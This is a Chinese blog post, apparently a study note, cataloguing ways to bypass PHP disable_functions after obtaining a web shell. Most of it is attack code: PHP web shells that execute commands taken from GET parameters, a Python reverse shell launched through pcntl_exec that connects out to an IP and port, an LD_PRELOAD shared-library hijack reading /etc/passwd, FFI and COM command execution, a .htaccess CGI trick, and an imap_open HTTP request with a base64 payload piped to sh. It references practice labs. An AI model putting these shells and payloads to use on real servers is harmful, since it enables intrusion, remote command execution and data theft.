学习笔记-绕过php禁用函数

最新推荐文章于 2023-12-26 11:04:31 发布
最新推荐文章于 2023-12-26 11:04:31 发布
阅读量662 收藏 1
点赞数
文章标签: php 学习 开发语言 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_35360663/article/details/127623448
版权

bypass_disable_function

相关文章 & Source & Reference

相关工具

相关靶场

disable_function

这个东西很明显就是什么呢,你能够代码执行了,但怎么都执行不了系统命令

实际上是开发者在后端的 php.ini 里写了如下语句

disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_socket_client,ftp_connect, ftp_login,ftp_pasv,ftp_get,sys_getloadavg,disk_total_space, disk_free_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname

常规绕过

理解为查看 PHPinfo 看看哪些没有被写进 ini 配置文件, 绕过限制。

  1. exec

    <?php echo exec('whoami');?>

  2. shell_exec

    <?php echo shell_exec('whoami');?>
<?php echo `whoami`; ?>

  3. system

    <?php system('whoami');?>

  4. $command

    <?php
$command=$_GET['command'];
$ret=`$command`;
echo $ret;
?>

  5. passthru

    <?php
$command=$_GET['command'];
passthru($command);
?>

  6. popen

    <?php
    $command=$_GET['command'];
    $fd = popen($command, 'r');
    while($s=fgets($fd)){
        print_r($s);
    }
?>

  7. proc_open

    <?php
    $command=$_GET['command'];
    $descriptorspec=array(
        0=>array('pipe','r'),
        1=>array('pipe','w'),
        2=>array('pipe','w')
    );
    $handle=proc_open($command,$descriptorspec,$pipes,NULL);
    if(!is_resource($handle)){
    die('proc_open failed');
    }
    while($s=fgets($pipes[1])){
    print_r($s);
    }
    while($s=fgets($pipes[2])){
    print_r($s);
    }
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($handle);
?>

pcntl_exec

目标机器若存在 python,可用 php 执行 python 反弹 shell

<?php

pcntl_exec("/usr/bin/python",array('-c','import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'));

?>

利用系统组件绕过 (win)

利用条件

  • windows环境
  • com组件(PHP5.4自带)(高版本扩展要自己添加)
    • extension=php_com_dotnet.dll

测试:

<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell');        // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec("cmd /c".$command);  //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

?a=command

ld_preload

LD_PRELOAD 是 Linux 系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

bypass 的关键就是利用 LD_PRELOAD 加载库优先的特点来让我们自己编写的动态链接库优先于正常的函数库,以此达成执行 system 命令。

使用条件

  • Linux 操作系统
  • putenv()
  • mail or error_log
  • 存在可写的目录, 需要上传 .so 文件

当 disable_functions 禁用了命令执行函数,如shell_exec,system等等。webshell 无法执行系统命令时,可以通过环境变量 LD_PRELOAD 劫持系统函数。

touch test.c
vim test.c

#include <unistd.h>
#include <sys/types.h>

uid_t geteuid(void){
        system("cat /etc/passwd");
}

生成动态链接库

gcc --share -fPIC test.c -o test.so

LD_PRELOAD=./test.so id

也可以传入如下 php 文件

<?php
putenv("LD_PRELOAD=./test.so");
mail('','','','');
?>

访问 php 文件就可以运行刚才的命令了

如果 mail() 函数无法使用,也可以使用 error_log('',1) 或者 mb_send_mail('','','')imap_mail("1@a.com","0","1","2","3")(如果 PHP 开启了 imap 模块)

蚁剑靶场测试

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/1
docker-compose up -d

连接 http://127.0.0.1:18080/index.php ant

使用「绕过 disable_functions」插件, 选择 LD_PRELOAD 模式进行

成功后可以看到目录下新建了一个 .antproxy.php 文件。我们创建副本, 并将连接的 URL shell 脚本名字改为 .antproxy.php, 就可以成功执行命令。

利用 FFI 扩展绕过

PHP7.4 的一个新特性 FFI(Foreign Function Interface)

当 PHP 所有的命令执行函数被禁用后,通过 PHP 7.4 的新特性 FFI 可以实现用 PHP 代码调用 C 代码的方式,先声明 C 中的命令执行函数,然后再通过 FFI 变量调用该 C 函数即可 Bypass disable_functions

使用条件

  • Linux 操作系统
  • PHP >= 7.4
  • 开启了 FFI 扩展且 ffi.enable=true
[ffi]
; FFI API restriction. Possible values:
; "preload" - enabled in CLI scripts and preloaded files (default)
; "false"   - always disabled
; "true"    - always enabled
ffi.enable=true

; List of headers files to preload, wildcard patterns allowed.
;ffi.preload=

使用 docker 部署服务:

apt-get install libffi-dev

docker-php-ext-install ffi

重启服务,上传 Payload 网页

<?php
$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("whoami > /tmp/123");
echo file_get_contents("/tmp/123");
@unlink("/tmp/123");
?>

蚁剑靶场测试

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/8
docker-compose up -d

连接 http://127.0.0.1:18080/index.php ant

使用「绕过 disable_functions」插件, 选择 PHP74_FFI 模式进行

Apache Mod CGI 绕过

CGI

CGI简单说就是:

放在服务器上的可执行程序, CGI 编程没有特定的语言, C 语言, linux shell,perl,vb 等等都可以进行 CGI 编程. 使用 linux shell 脚本编写的 cgi 程序便可以执行系统命令.

使用条件

  • Linux 操作系统
  • Apache + PHP (apache 使用 apache_mod_php)
  • Apache 开启了 cgi, rewrite
  • Web 目录给了 AllowOverride 权限
  • 当前目录可写

MOD_CGI

任何具有 MIME 类型 application/x-httpd-cgi 或者被 cgi-script 处理器处理的文件都将被作为 CGI 脚本对待并由服务器运行,它的输出将被返回给客户端。可以通过两种途径使文件成为 CGI 脚本,一种是文件具有已由 AddType 指令定义的扩展名,另一种是文件位于 ScriptAlias 目录中.

在 apache 主配置文件中做如下设置

<Directory 路径>

Options +ExecCGI

</Directory>

例如:

<Directory /var/www/html/>

Options +ExecCGI                      #这便是允许cgi程序执行

</Directory>

绕过disable_functions

利用 mod_cgi 来绕过 disable_functions 思路也很清楚了. 利用 htaccess 覆盖 apache 配置,增加 cgi 程序达成执行系统命令,事实上同上传 htaccess 解析 png 文件为 php 程序的利用方式大同小异。

在本地准备好 htaccess 文件和要执行命令的 cgi 文件 , 如下

test.xxx:

#!/bin/bash
echo&whoami

.htaccess:

Options +ExecCGI
AddHandler cgi-script .xxx

将两个文件上传至服务器,使用 php 的 chmod 函数给 test.xxx 添加可执行权限。

chmod('test.xxx',0777)

访问目标 xxx 文件即可执行命令

蚁剑靶场测试

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/3
docker-compose up -d

连接 http://127.0.0.1:18080/index.php ant

利用 ShellShock (CVE-2014-6271)

使用条件

  • Linux 操作系统
  • putenv
  • mail or error_log 本例中禁用了 mail 但未禁用 error_log
  • /bin/bash 存在 CVE-2014-6271 漏洞
  • /bin/sh -> /bin/bash sh 默认的 shell 是 bash

目前的 bash 脚本是以通过导出环境变量的方式支持自定义函数,也可将自定义的 bash 函数传递给子相关进程。一般函数体内的代码是不会被执行,但此漏洞会错误的将 “{}” 花括号外的命令进行执行。

因为是设置环境变量,而在 php 中存在着 putenv 可以设置环境变量,配合开启子进程来让其执行命令。

利用 iconv 扩展执行命令

使用条件

  • Linux 操作系统
  • putenv
  • iconv
  • 存在可写的目录, 需要上传 .so 文件

蚁剑靶场测试

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/9
docker-compose up -d

连接 http://127.0.0.1:18080/index.php ant

使用「绕过 disable_functions」插件, 选择 iconv 模式进行

成功后可以看到 /var/www/html/ 目录下新建了一个 .antproxy.php 文件。我们创建副本, 并将连接的 URL shell 脚本名字改为 .antproxy.php, 就可以成功执行命令。

利用 ImageMagick 绕过

漏洞源于 CVE-2016-3714,ImageMagick 是一款图片处理程序,但当用户传入一张恶意图片时,会造成命令注入,其中还有其他如 ssrf、文件读取等。

上传恶意的图片,然后上传以一个poc

<?php
new Imagick('poc.jpg');

访问即可看到我们写入的文件。

利用 PHP-FPM 绕过

PHP-FPM(FastCGI Process Manager:FastCGI 进程管理器) 是一个 PHPFastCGI 管理器,对于 PHP 5.3.3 之前的 php 来说,是一个补丁包 ,旨在将 FastCGI 进程管理整合进 PHP 包中。如果你使用的是 PHP5.3.3 之前的 PHP 的话,就必须将它 patch 到你的 PHP 源代码中,在编译安装 PHP 后才可以使用。

Fastcgi 是一种通讯协议,用于Web服务器与后端语言的数据交换。

以攻击 tcp 为例,倘若我们伪造 nginx 发送数据(fastcgi 封装的数据)给 php-fpm,这样就会造成任意代码执行漏洞。

可以配合 gopher 协议来攻击内网的 fpm

利用 imap_open 绕过(CVE-2018-19518)

imap 扩展用于在 PHP 中执行邮件收发操作,而 imap_open 是一个 imap 扩展的函数,在使用时通常以如下形式:

$imap = imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);

那么该函数在调用时会调用 rsh 来连接远程 shell,而在 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能,也即是说在这俩系统中调用的实际上是 ssh,而 ssh 中可以通过 -oProxyCommand= 来调用命令,该选项可以使得我们在连接服务器之前先执行命令,并且需要注意到的是此时并不是 php 解释器在执行该系统命令,其以一个独立的进程去执行了该命令,因此我们也就成功的 bypass disable function 了。

POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

其中使用了%09来绕过空格,以base64的形式来执行我们的命令

UAF

Json Serializer UAF

漏洞利用 json 在序列化中的堆溢出触发 bypass

使用条件

  • Linux 操作系统
  • PHP 版本
    • 7.1 - all versions to date
    • 7.2 < 7.2.19 (released: 30 May 2019)
    • 7.3 < 7.3.6 (released: 30 May 2019)

蚁剑靶场测试

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/6
docker-compose up -d

连接 http://127.0.0.1:18080/index.php ant

使用「绕过 disable_functions」插件, 选择 Json Serializer UAF 模式进行

UAF 一次可能不成功,需要多次尝试

PHP7 GC with Certain Destructors UAF

漏洞利用的是 php garbage collector(垃圾收集器)程序中的堆溢出达成 bypass

使用条件

  • Linux 操作系统
  • PHP 版本
    • 7.0 - all versions to date
    • 7.1 - all versions to date
    • 7.2 - all versions to date
    • 7.3 - all versions to date

UAF 一次可能不成功,需要多次尝试

Backtrace UAF

漏洞利用的是 debug_backtrace 这个函数,可以利用该函数的漏洞返回已经销毁的变量的引用达成堆溢出

使用条件

  • Linux 操作系统
  • PHP 版本
    • 7.0 - all versions to date
    • 7.1 - all versions to date
    • 7.2 - all versions to date
    • 7.3 < 7.3.15 (released 20 Feb 2020)
    • 7.4 < 7.4.3 (released 20 Feb 2020)

SplDoublyLinkedList UAF

删除元素的操作被放在了置空 traverse_pointer 指针前。

所以在删除一个对象时,我们可以在其构析函数中通过 current 访问到这个对象,也可以通过 next 访问到下一个元素。如果此时下一个元素已经被删除,就会导致 UAF。

点击关注,共同学习!安全狗的自我修养

github haidragon

https://github.com/haidragon

C-haidragon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
突破PHP disable_functions禁用函数常用绕过姿势
白泽Sec安全实验室
01-01 3130
前言:最近拿到一个shell,被禁用php中能直接执行系统程序的函数,虽然最后没有绕过成功。但是也有不小的收获。 首先说下shell怎么来的 一个织梦的站,找到后台登录路径。随手输入默认账户密码:admin/admin,顺利进入后台 利用DedeCMS V5.7 SP2后台存在代码执行漏洞拿到shell 1.首先获取token。访问域名 + /dede/tpl.php?action=upload http://127.0.0.1/uploads/dede/tpl.php?action=upload 通
pcntl php windows_姿势分享——PHP函数禁用绕过浅谈
weixin_39550172的博客
01-06 222
在渗透测试过程中可能经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。话不多说,直接贴代码:...
PHP函数绕过
慎铭的博客
02-17 539
md5()   md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。如需计算文件的 MD5 散列,请使用 md5_file() 函数。 语法 md5(string, raw) - string 不可缺省。规定要计算的字符串 - raw 可缺省。规定十六进制或二进制的输出格式: - TRUE - 原始 16 字符二进制格式 - FALSE - 默认。32 字符十六进制数 - 返回值 如果成功则返回已计算的 MD5 散列,如果失败则返回 FA
php绕过
qq_74071644的博客
11-29 936
PHP中==是判断值是否相等,若两个变量的类型不相等,则会转化为相同类型后再进行比较。当MD5加密后以0E开头的字符他们==判断相等。
分享一个php下,linux下突破system命令限制的马(方法)
shadowwolf’s blog
07-09 576
<?php $cmd=$_GET["cmd"]; pwn($cmd); function pwn($cmd) { global $abc, $helper; function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address
PHP语言基础学习笔记-php函数大全笔记
最新发布
06-28
### PHP语言基础学习笔记-php函数大全笔记 #### 一、PHP概述与基本概念 - **PHP简介**: - PHP(Hypertext Preprocessor,原名Personal Home Page)是一种广泛使用的开源服务器端脚本语言,特别适合Web开发,并且...
python学习笔记-函数式编程-20200310
12-22
文章目录函数式编程高阶函数(Higher-order function)map/reducefilter用filter求素数exercisesorted-排序算法exercise返回函数函数作为返回值闭包exercise匿名函数erercise小结装饰器定义使用示例exercise小结偏...
go学习笔记-文档-文档
07-21
本文档集合了关于Go语言学习笔记,旨在帮助读者全面理解并掌握Go语言的核心概念、语法特性以及实际应用。 一、基础语法 Go语言的语法简洁明了,易于上手。它采用了C风格的语法,但增加了诸如类型推断(Type ...
C++学习笔记--函数
09-08
**C++学习笔记--函数** 在C++编程中,函数是一种可重用的代码块,它执行特定的任务并可能接收参数、返回值或两者都有。本笔记将深入探讨C++中的函数,包括它们的定义、调用、参数传递以及如何在实际编程中有效地...
ORACLE学习笔记-添加更新数据函数
12-16
一、添加数据 /*添加数据*/ insert into STU values('stu0004','赵一',18,1,"kc0004"); insert into STU(STU_ID,STU_NAME,STU_AGE,STU_SET ) values('stu0013','储十一',19,1); 说明:如果不指定将数据添加到那个...
一次项目中Thinkphp绕过禁用函数的实战记录
菜鸟教程
03-23 1333
更多python教程请到友情连接: 菜鸟教程https://www.piaodoo.com 茂名一技http://www.enechn.comppt制作教程步骤 http://www.tpyjn.cn 兴化论坛http://www.yimoge.cn 电白论坛 http://www.fcdzs.com 目录前言file_put_contents pcntl_exec LD_PRELOAD 劫持 总结前言 在一次渗透测试中,手工找了许久没发现什么东西,抱着尝试的心情打开了xray 果然xray还是挺给力
从一道ctf题学习LD_PRELOAD绕过函数禁用
m0_62422842的博客
09-13 1576
前两天做了一道ctf题目,遇到比较陌生的知识点,利用LD_PRELOAD环境变量,调用新的进程来加载恶意的so文件,执行我们注入程序中的恶意代码,从而绕过函数限制。当然,这么说也比较抽象,后文会详细说明。
[网鼎杯 2020 朱雀组]phpweb
qq_57861415的博客
04-02 92
[网鼎杯 2020 朱雀组]phpweb
突破PHP disable_functions方法
good good study
12-26 1519
在访问过程中,putenv()函数将我们写好的恶意动态链接库文件赋值给LD_PRELOAD环境变量,然后在调用mail()和error_log的时候,Linux会执行系统程序sendmail,但是在执行sendmail的main函数之前,会先执行我们设计好的用了__attribute__ ((__constructor__))参数修饰的恶意函数,从而导致了命令的执行。图片切割、颜色替换、各种效果的应用,图片的旋转、组合,文本,直线,多边形,椭圆,曲线,附加到图片伸展旋转。访问test.php
Nginx反向代理实现负载均衡webshell
qq_68163788的博客
11-26 2137
Nginx是一个高性能的反向代理服务器,可以用于实现负载均衡。在这种情况下,我们可以使用Nginx来实现负载均衡webshell。 Webshell是一种通过Web界面对服务器进行操作的工具,通常用于管理和监控服务器。通过Nginx的负载均衡功能,我们可以将对webshell的请求分发到多个后端服务器上,从而提高系统的稳定性和性能。webshell_servers的upstream块,其中包含了多个webshell后端服务器的地址和端口。
蚁剑插件之绕disable_functions
zlzg007的博客
09-08 8033
蚁剑插件之绕disable_functions 概述 有些网站会禁用php中的一些危险函数,导致即使上传马上去,也执行不了命令,很典型的就是宝塔的网站。 蚁剑有个插件专门用于解决这个问题。 绕过的方法有好几种,大多都是针对linux,有一个windows能用,但经过尝试还是不行,所以说如果碰到windows这种情况,就可以直接放弃了。 方法 直接运行插件,选择绕过方式: 然后,直接开始,运行成功后会生成两个文件: 直接使用蚁剑连接.antproxy.php那个文件,密码还是原来的密码, 就可以命令执行了
PHP绕过disable_function限制
qq_44657899的博客
10-19 2683
文章目录寻找未禁用函数 寻找未禁用函数 一些读取目录的函数: print_r(scandir("/")); var_dump(scandir("/")); 读取文件的函数: highlight_file('flag.php'); include('/flag'); show_source(); require();
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2258
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
php disable_function绕过
weixin_45794666的博客
03-03 3531
bypass disable_functions disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。 要进行添加的话在php.ini中添加即可,每个函数之间使用逗号隔开。 配置 打开php.ini,搜索disable_function,添加如下函数 eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_o
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C-haidragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值